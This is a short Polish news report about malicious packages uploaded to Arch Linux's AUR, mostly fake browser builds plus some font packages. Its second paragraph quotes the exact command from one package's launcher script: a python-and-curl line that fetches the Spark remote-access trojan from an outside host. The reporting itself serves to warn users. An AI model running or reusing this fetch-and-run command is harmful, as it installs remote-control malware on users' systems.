W repozytorium AUR (Arch User Repository), stosowanym w Arch Linux do dystrybucji pakietów od zewnętrznych deweloperów, kontynuowane są publikacje złośliwego kodu, zintegrowanego w pakietach nieoficjalnych wersji przeglądarek. Oprócz zidentyfikowanych dwa tygodnie temu złośliwych pakietów firefox-patch-bin, librewolf-fix-bin oraz zen-browser-patched-bin, do AUR dodano pakiet google-chrome-stable, również zawierający modyfikację, która instaluje złośliwy komponent umożliwiający zdalny dostęp do systemu.
W pliku PKGBUILD problematycznego pakietu zidentyfikowano instalację skryptu do uruchamiania przeglądarki google-chrome-stable.sh, który zawierał między innymi polecenie ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘, pobierające złośliwe oprogramowanie rozpoznawane przez usługę VirusTotal jako trojan Spark, który umożliwia zdalne zarządzanie systemem, uruchamianie procesów, przesyłanie plików, inspekcję ruchu oraz robienie zrzutów ekranu.
Złośliwy pakiet google-chrome-stable został wczoraj pobrany i usunięty przez administratorów AUR kilka godzin po jego pojawieniu się. Niemal od razu po usunięciu google-chrome-stable do AUR załadowano dwa złośliwe pakiety — „chrome” i „chrome-bin”, które zawierały podobny skrypt instalacyjny złośliwego oprogramowania na systemie użytkownika.
Następnie zidentyfikowano jeszcze trzy pakiety ze złośliwym kodem: ttf-mac-fonts-all, ttf-ms-fonts-all oraz gromit.
Źródło: opennet.ru
